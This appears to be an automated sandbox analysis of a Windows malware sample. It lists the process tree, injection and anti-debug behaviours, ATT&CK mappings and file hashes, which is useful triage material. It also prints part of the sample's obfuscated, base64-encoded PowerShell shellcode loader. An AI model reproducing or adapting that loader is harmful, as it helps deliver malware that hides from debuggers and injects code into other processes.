FIATQBJADkALABpAG4AdAAgAFEAdQBpAGwAbAAwACkAOwANAAoADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAVgBnAHQAbABmAHQAMwAgAGEAawBlAG4AZQBzAHMAagAgAE4ATwBOAEQARQBGACAATgBvAG4AZgBhAHIAbQA1ACAAdAByAGUAbgBjAGgAYwBvAGEAdAAgAGgAZQBzAHQAZQBwAHIAIABHAEUATgBBAFYATgBFAE4ARQBUACAARABlAGYAZQBhAHQAaQAxACAAVABqAGUAbgBzAHQAdgBpADIAIABUAFIAQQBJACAAawBvAHIAcgBpAGQAbwByACAARgBKAEUAUgBCAE8AIABQAEkAQwBJAEYAIABUAGUAawBzAHQAcwB0AHUAIABlAG4AdABlAHIAbwBjAHIAaQAgAFUAYgBlAGgAZQAgAFIAaABvAG0AYgBvAGcAZQBuAGkANgAgAGUAcgBpAG4AcwBnAGEAcgBkAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAG8AdgBuAHMAYwBhAHIAZgBwACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAZgBzAGsAYQBhAHIAZQB0ACIAIAANAAoAJABRAHUAaQBsAGwAMwA9ADAAOwANAAoAJABRAHUAaQBsAGwAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABRAHUAaQBsAGwAOAA9AFsAUQB1AGkAbABsADEAXQA6ADoATQB1AHoAdQBuAG4AYQAoAC0AMQAsAFsAcgBlAGYAXQAkAFEAdQBpAGwAbAAzACwAMAAsAFsAcgBlAGYAXQAkAFEAdQBpAGwAbAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMATgBvAHYAZQBtAGIAZQA2ACAAVAByAG8AbABkAHMAcABlAGoAbAA3ACAAUgBPAFMASwBJAEwARAAgAE8AcgB0AGgAbwBwAGUAZABpADEAIABNAG8AbgBpAHQAbwByAHMAaAAgAFMAdAB1AG0AcABlAHQAYgBlAGgAMQAgAFMAawB2AGUAIABQAHIAbwBzAGEAaQBzAHQAcwAxACAAQgBJAFMAVABBAE4ARABTAEgASgAgAG0AaQBzAGQAYQB0AGkAIABDAE8AUgBPAFQAIABCAHIAbgBlAGIAYQBsAGwAZQB0ADIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABoAGUAZwA1ACIAIAANAAoAJABRAHUAaQBsAGwAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwAUwBKAFUAUwAuAGQAYQB0ACIADQAKACMATwBwAHIAeQBrAG4AaQBuACAAawBvAG0AbQB1AG4AZQBzAGsAYQAgAEQAZQBtAGkANwAgAE4ATwBOAEQARQBOAFMARQAgAEcAYQBsAGQAOQAgAFIAbQBlAGIAcgB0AHQAMgAgAGEAYgBzAG8AbAB2AGUAcgBpACAARwBSAEkAUABUAFAARQBSAFMATwAgAEIAbABlAHAAaAA3ACAAQgBvAHIAdABlAGwAaQA4ACAATQBhAHMAcwBlAGsAaABvAHQAMgAgAG4AbwByAHQAaABiAG8AdQBuAGQAIABDAEkAUgBLAFUAUwBNAEEAIABGAHIAZwBlAHIAaQAgAFIARQBTAEUAQQBUAEsATwAgAGEAcgBhAGIAZQBzAGsAcwBiAG4AIABGAE8AUgBGAFIAWQBTAE4ASQBOACAATwBWAEUAUgBDAE8AVgAgAFMASABJAFYAQQBJAFMAIABCAEEATABEAEYAQQBDAEUARAAgAFUAbwBwAHMAdAB0ADkAIABHAGUAbgBlAHIAbwB1AHMAZgB5ACAAdgBhAHIAaQAgAFIAZQBjAG8AbgBuAG8AOAAgAE8AcgB0AGgAbwBzAHQANgAgAFMAUABJAE4ARABIAFIAUgAgAEQAZQBsAHMAcABlAGMAaQAxACAAUwBUAEEATgBHAEIASQBEAFMAIABNAGUAbgB1AGkAcwBlAHIAIABPAHYAZQByAHMAdABlAGEAIABEAEQASwBFACAADQAKACQAUQB1AGkAbABsADQAPQBbAFEAdQBpAGwAbAAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAUQB1AGkAbABsADIALAAyADEANAA3ADQAOAAzADYANAA4ACwAMQAsADAALAAzACwAMQAyADgALAAwACkADQAKACMATAB5AGcAdAAgAGIAYQBsAGwAZQAgAEgAYQB2AGUAbABhAGwAaQBrAHUAIABkAG8AbQBtAGUAcgB2AGEAIABVAG4AawBuAGUAbABsAGUAZABwADQAIABzAGEAYwBjACAAVAByAGEAbgAzACAAQwBZAFMAVABPAEUAUABJACAAcgBlAHMAaQBkAGUAcgBmACAAZgB1AGsAcwBzAHYAIABWAEkAVABVAFAARQBSAEEAVAAgAGgAZQB0AGUAIABiAGUAZgBsAGoAZQB0AGIAIABUAHIAbwBuAGIAIABQAEwARQBBAFQATABFAFMAUwAgAEEAZgByAGkAZABzAGUAbgBlACAAVQBOAFMAVABVAE4ATgBFACAAawBhAHUAdABpAG8AbgAgAEEARQBSAEEAIABLAG8AYgBsAGUANQAgAHIAdQBzAHMAbwBwAGgAaQBsAGkAIABzAGUAawBzAG8AZwB0ACAAZwBsAG8AYgB1AGwAbwB1ACAAQQBQAEkAQwBLAEIAQQAgAFUARABTAEwAQQBHACAAZgByAGUAbQBzAGEAdAAgAE0AZQBsAGwAZQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAdwBuAGkAdABlAGEAZwBlACIAIAANAAoAJABRAHUAaQBsAGwANQA9ADAAOwANAAoAIwBTAGsAaQBsAGwAZQB2ADMAIABTAFUAQgBDAEwAQQBWACAARgBsAGcAZQBzAGUAZABsAGUAbgAgAEkAbgBkAHMAawByAGkAZgB0AGUAMgAgAFMAQwBVAFQAQwBIAEUATwBOACAAQgBlAHIAYgBlAHIAawBhADEAIABJAGwAbABlAGcAaQBiAGwANAAgAEUAbABlAGsAdAA4ACAAVABlAGcAbgBlAHMAdAB1AGUAIABCAHIAYQBuAGQAaABhAG4AZQByADcAIAB6AGUAaQB0AHYAYQAgAE0AQQBFAFMAIABEAGkAYQBtAG8AbgBkAHcAaQAgAGUAawBzAG8AcgBjAGkAIABpAG4AYwBsACAAQQBMAEwARQBHAE8AIABKAGUAcgByAHkAYgA1ACAAUwBwAGUAYwBpAGEAbAB1AGQANQAgAEcAZQBuAG8AcAAgAHUAbABkAHQAcgBqACAAUwBhAGcAZgAgAFMAZQBtAGkAZABlAGYAZQA0ACAAUwBrAGoAbwBsAGQAYgByADUAIABLAE4AUwBCAEUAUwAgAGkAbgB2AGUAcwB0AGUAIABQAG8AbgB0AGUAZgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdQBsAHQAcgBhAHMAdAAiACAADQAKAFsAUQB1AGkAbABsADEAXQA6ADoAUgBlAGEAZABGAGkAbABlACgAJABRAHUAaQBsAGwANAAsACQAUQB1AGkAbABsADMALAA2ADcAMgAyADMALABbAHIAZQBmAF0AJABRAHUAaQBsAGwANQAsADAAKQANAAoAIwBTAFQATwBGAFQASQBMAEYAUgBTACAAZwBvAHYAZQByAG4AbQAgAEsAaQBuAGEAcwB2AGkAIABQAGEAcgBhAG0AbwAgAEkAbgBkAHQAZwB0AHMAIABQAE8AQgBFACAAVABBAEIASQBUAFUAIABHAHUAbABkAHYAcgBkAGkAZQByADEAIABNAFAAQgBTAEQASQBBAEMAVAAgAFMAdABhAG4AZABzAGUAZABlAHMANgAgAFAAcgBvAGcAcgBhAG0AbQA5ACAAUgBhAGsAcgAyACAAQwBFAEQARQBSAFQAUgBFAFQARgAgAG8AdgBlAHIAcwBlAG4AIAB2AGEAbgBkACAAcwBhAG4AZwBhAHIAcwAgAE8AVABUAEUAIABIAEUAUABBACAATQBPAE4ARQBZAE0AQQAgAHMAdgByAGQAZgBzAHQAZQByAG4AIAB1AG4AZABlAHIAYgB1AHQAbABlACAAUABSAE8AVABPAEsATwBMAEwAUgAgAFIAVQBGAEYARQBOAEUAUwBNAEkAIABTAHQAbwByADMAIABWAEUATgBFAE4ATwBTAEkAUAAgAFUARABCAFkARwBOAEkATgBHACAASABlAHMAaQAxACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgB0AHIAZQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE4ATwBOAEUAVgBBAEQASQBOACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE4AbwBuAHAAOQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAG8AbABsAHkAbwB2AGUAcgA1ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAcgBlAGQAZQB0AGUAcgA5ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEMAaQBiAGEAdAA4ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAdgBsAHMAaABpAG4AZwBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMATgBFAEcAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdQBuAHMAaQBjAGsAZQByAG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARgBvAGwAawAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBmAGwAeQB2AGUAcgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgB1AG4AaQBtAGUAZABpAGEAbABzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIARQBUAEYAUgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBNAFUAUgBTACIAIAANAAoAWwBRAHUAaQBsAGwAMQBdADoAOgBMAGkAbgBlAEQARABBACgAMQAwACwAIAAxADEALAAgADEAMgAsACAAMQA0ACwAJABRAHUAaQBsAGwAMwAsACAAMAApAA0ACgANAAoA"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rrj1uj0w.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85F3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC85E2.tmp"
4⤵
PID:1364

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1300

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

1

T1158

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES85F3.tmp
MD5
5c631dd0c9cc26a3576b6e2eb53cd0ca

SHA1
e8a70c1e03831c8ec4624a7c4fc6edd32a5223b7

SHA256
1d9adee776721707378f15a788798a095945753c061e063bb7dba078edc05ace

SHA512
c781f2dfbfab885b1d152f86826d4f9e8c6112910ee8d2f217879d8c06799f59fc00d21d18d3a03480e0e2bb0c4703b66ce5cbc3c38fbef545ba2560cc90c084

Download Submit
C:\Users\Admin\AppData\Local\Temp\SJUS.dat
MD5
41d834d598a20c22be84fdda4ea9de0d

SHA1
59d72032fb28f84c6d2cbb4d9f6ad4059d65e6de

SHA256
01d7a35dd43610a1cbe35b969ceebb0d9a06940ff29da71066ab4978e5b61a75

SHA512
eb3effd491d7fb8e9c046f66f9afb82c45c14fb5eeb8c01490c724384ba1c6e663e3b12eea33add4820c94192353b6ab56826e87477f33bf7fef586473b75141

Download Submit
C:\Users\Admin\AppData\Local\Temp\rrj1uj0w.dll
MD5
fe83bbce88215c0bc8132896d29157c7

SHA1
7bf9a86714547c867ad6fd610d19d645826fb1d9

SHA256
d3704ec7998bdf16291123b53221d97ac3e0fd5c74f50bc205b03f93e2825301

SHA512
b0c4ab591c016f61d14093fef002d873cca599100509193c7868aa43c5cf5194ebb31806e94a6bfda7ef30e9410ceb44399820a5ba9925e87a267ede35cf6ae8

Download Submit
C:\Users\Admin\AppData\Local\Temp\rrj1uj0w.pdb
MD5
8aaf400f8520554c29c9625b24e2cf9e

SHA1
836a798fd9dfc046985ad1bdde9e230d9896c742

SHA256
8504252ee2862e1418997882d702ad655ffec9fc78c17e96cd52a0695988608f

SHA512
3e870e6b7139d989adb26f1a0340d8b877cbceef2500820966c5bfc4a57ef635750b61da90400cf810df9b7404dfb5cc7658e536104b935eba2fbf434a8a02d3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC85E2.tmp
MD5
beaa2acb90f869245357b4c0a2078ba2

SHA1
ca0f8e680b56cc852da971d072b11e79424397b4

SHA256
09ca3944db24de79daadf118f3f97af03db6df5b99efc27f1b8e8428af3e2497

SHA512
f358f954dee43f30bd0cb23eefeef5fc394cbabe067d28284dc59bd5df457084cb057db259f725f3044eb249f2b36ac43af8a7cff06ca1a590e61cb15305d700

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rrj1uj0w.0.cs
MD5
132f91790d899096b0e07d5b01acafd1

SHA1
3b8eae1cc8dea91362da5bb3be48e6ba04674ed3

SHA256
be4042b15ae80934b9ff2f6bb5814d71d83fc65fd64c7877b264653c94bc3c01

SHA512
2d752e3d6ed8382313c338eda29df1c7ae1c0b19e7d5a92fc201ba386579512c863d39096a7a56e75c77c389cfb9acc76ddf83c79e23bd3540d8e06929dfb4cb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rrj1uj0w.cmdline
MD5
0a6a8c7d639b8454aeea9896436b44b5

SHA1
d15072da1d6aa1a93686ab124476aeb30a1cdabc

SHA256
860ef4cb7c366fa824aac171d6c19814b693c10becee61f14382d4ec8f94b192

SHA512
06649e29dfb61a1f872361d950aa0fa8698bacdbca307335bb205c035040ab35c019f59cce9d9d5dc90bac097def2e83ebb3b03e3f546d0051fec2188b717d39

Download Submit
memory/1000-59-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1000-73-0x00000000777A0000-0x0000000077920000-memory.dmp

Filesize
1.5MB

Download
memory/1000-58-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1000-57-0x0000000074040000-0x00000000745EB000-memory.dmp

Filesize
5.7MB

Download
memory/1000-56-0x0000000002480000-0x00000000030CA000-memory.dmp

Filesize
12.3MB

Download
memory/1000-55-0x0000000074040000-0x00000000745EB000-memory.dmp

Filesize
5.7MB

Download
memory/1000-67-0x0000000005B00000-0x0000000005C00000-memory.dmp

Filesize
1024KB

Download
memory/1000-54-0x0000000075E51000-0x0000000075E53000-memory.dmp

Filesize
8KB

Download
memory/1000-71-0x00000000775C0000-0x0000000077769000-memory.dmp

Filesize
1.7MB

Download
memory/1000-72-0x00000000777A0000-0x0000000077920000-memory.dmp

Filesize
1.5MB

Download
memory/1300-70-0x0000000000130000-0x0000000000230000-memory.dmp

Filesize
1024KB

Download
memory/1300-75-0x00000000775C0000-0x0000000077769000-memory.dmp

Filesize
1.7MB

Download
memory/1300-76-0x00000000777A0000-0x0000000077920000-memory.dmp

Filesize
1.5MB

Download
memory/1300-79-0x00000000777A0000-0x0000000077920000-memory.dmp

Filesize
1.5MB

Download

Resubmissions

Analysis

Sharing